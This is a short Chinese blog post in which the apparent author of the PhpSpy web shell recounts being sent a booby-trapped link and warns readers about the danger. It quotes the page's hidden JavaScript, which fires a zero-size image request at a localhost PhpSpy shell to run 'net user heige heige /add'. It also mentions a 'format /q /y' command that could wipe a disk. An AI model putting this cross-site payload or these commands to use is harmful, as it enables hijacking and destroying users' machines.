事情起因:http://superhei.blogbus.com/logs/12289653.html
结论:以后对于小黑发的LINK一定要小心翼翼。要不然我的机器上就多了一个heige用户了。幸好我的COOKIE有问题。登陆任何论坛和博客。关闭浏览器就无效了。哪怕选了时效的。
小黑叫我看我的C盘有没有heige.txt的时候。我马上就把刚才小黑发的LINK的源代码看了一下。
JavaScript代码
- <script>
- var url = 'http://localhost/phpspy/2008.php?action=shell&execfunc=system&command=net user heige heige /add|echo fuck >c:\\heige.txt';
- getURL(url);
- function getURL(s) {
- var image = new Image();
- image.style.width = 0;
- image.style.height = 0;
- image.src = s;
- }
- </script>
上面的代码一看吓我一跳。因为我装的是APACHE套件的,所以服务还是SYSTEM权限运行的。如果不是我的COOKIE有问题。PHPSPY2008处于登陆状态。就被执行命令了。还好是小黑。如果是其他人狠一点的话。来一个format /q /y,那我都不知道找谁了。看来以后一定不能在网上暴露过多自己计算机的信息。
网络——危险无处不在。
4ngel / Small!A
